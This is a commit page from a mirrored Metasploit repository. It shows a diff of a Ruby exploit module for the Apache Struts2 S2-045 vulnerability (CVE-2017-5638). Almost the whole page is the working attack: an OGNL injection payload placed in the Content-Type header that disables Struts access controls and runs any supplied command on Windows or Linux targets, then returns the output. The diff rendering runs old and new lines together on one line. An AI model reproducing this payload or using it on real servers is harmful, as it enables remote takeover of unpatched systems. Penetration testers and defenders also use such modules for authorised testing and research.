infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Struts2 S2-045 Exploit 2017/03/08

bug/bundler_fix
root 2017-03-08 14:26:33 +08:00
parent b73a884c05
commit c5fb69bd89
1 changed files with 67 additions and 80 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

147
modules/exploits/multi/http/struts2_s2045_rce.rb
View File

@ -1,89 +1,76 @@
require 'msf/core' require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
def initialize(info = {}) super(update_info(info,
super(update_info(info, 'Name' => 'Apache Struts2 S2-045 Remote Code Execution Exploit(CVE-2017-5638)',
'Name' => 'Apache Struts2 S2-045 Remote Code Execution Exploit(CVE-2017-5638)', 'Description' => %q{It is possible to perform a RCE attack with a malicious Content-Type value.If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.Discoverd by Nike.Zheng.
'Description' => %q{ },
It is possible to perform a RCE attack with a malicious Content-Type value.If the Content-Type value isn't valid an exception is thrown which is then used to display an error message to a user.Discoverd By Nike.Zheng. 'Author' => [ 'Exploit: Nike.Zheng','MSF Module: Chorder(http://chorder.net)'],
}, 'License' => MSF_LICENSE,
'Author' => [ 'MSF Module: Chorder(http://chorder.net)'], 'References' => [ [ 'CVE', '2017-5638'] ],
'License' => MSF_LICENSE, 'Privileged' => true,
'References' => 'Platform' => %w{ linux win },
[ 'Arch' => 'x86',
[ 'CVE', '2017-5638'] 'DefaultOptions' =>{
], 'CMD' => 'whoami'
'Privileged' => true, },
'Platform' => %w{ linux win }, 'Targets' =>[
'Arch' => 'x86', ['Windows Universal',
'DefaultOptions' =>{ {
'CMD' => 'whoami' 'Arch' => ARCH_X86,
}, 'Platform' => 'win',
'Targets' => 'CmdStagerFlavor' => 'tftp'
[ }
['Windows Universal', ],
{ ['Linux Universal',
'Arch' => ARCH_X86, {
'Platform' => 'win', 'Arch' => ARCH_X86,
'CmdStagerFlavor' => 'tftp' 'Platform' => 'linux'
} }
], ],
['Linux Universal', ],
{ 'DefaultTarget' => 0,
'Arch' => ARCH_X86, 'DisclosureDate' => 'Mar 06 2017'))
'Platform' => 'linux' register_options(
} [
], Opt::RPORT(8080),
], OptString.new('URI', [ true, 'The path to a struts application action ie. /struts2.action', ""]),
'DefaultTarget' => 0, OptString.new('CMD', [ true, 'Execute this command instead of using command stager', "" ])
'DisclosureDate' => 'Mar 06 2017')) ], self.class)
register_options(
[
Opt::RPORT(8080),
OptString.new('URI', [ true, 'The path to a struts application action ie. /struts2.action', ""]),
OptString.new('CMD', [ true, 'Execute this command instead of using command stager', "" ])
], self.class)
end
def execute_command(cmd, opts = {})
uri = normalize_uri( datastore['URI'] )
headers ={
"Content-Type"=>"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+cmd+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
}
data = '----------1529557865\r\n\Content-Disposition: form-data; name="file"; filename="test.txt"\r\n\000'
print_status("Target URI: #{uri}")
print_status("Attempting to execute: #{cmd}")
resp = send_request_raw({
'host' => rhost,
'port' => rport,
'uri' => uri,
'version' => '1.1',
'method' => 'POST',
'headers' => headers,
'data' => data,
}, 5)
print_status( resp.body )
end
def exploit
unless datastore['CMD'].blank?
print_status("Executing Command...")
execute_command(datastore['CMD'])
return
end end
handler
end
def execute_command(cmd, opts = {})
uri = normalize_uri( datastore['URI'] )
headers ={
"Content-Type"=>"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+cmd+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
}
data = '----------1529557865\r\n\Content-Disposition: form-data; name="file"; filename="test.txt"\r\n\000'
print_status("Target URI: #{uri}")
print_status("Attempting to execute: #{cmd}")
resp = send_request_raw({
'host' => rhost,
'port' => rport,
'uri' => uri,
'version' => '1.1',
'method' => 'POST',
'headers' => headers,
'data' => data,
}, 5)
print_status( resp.body )
end
def exploit
unless datastore['CMD'].blank?
print_status("Executing Command...")
execute_command(datastore['CMD'])
return
end
handler
end
end end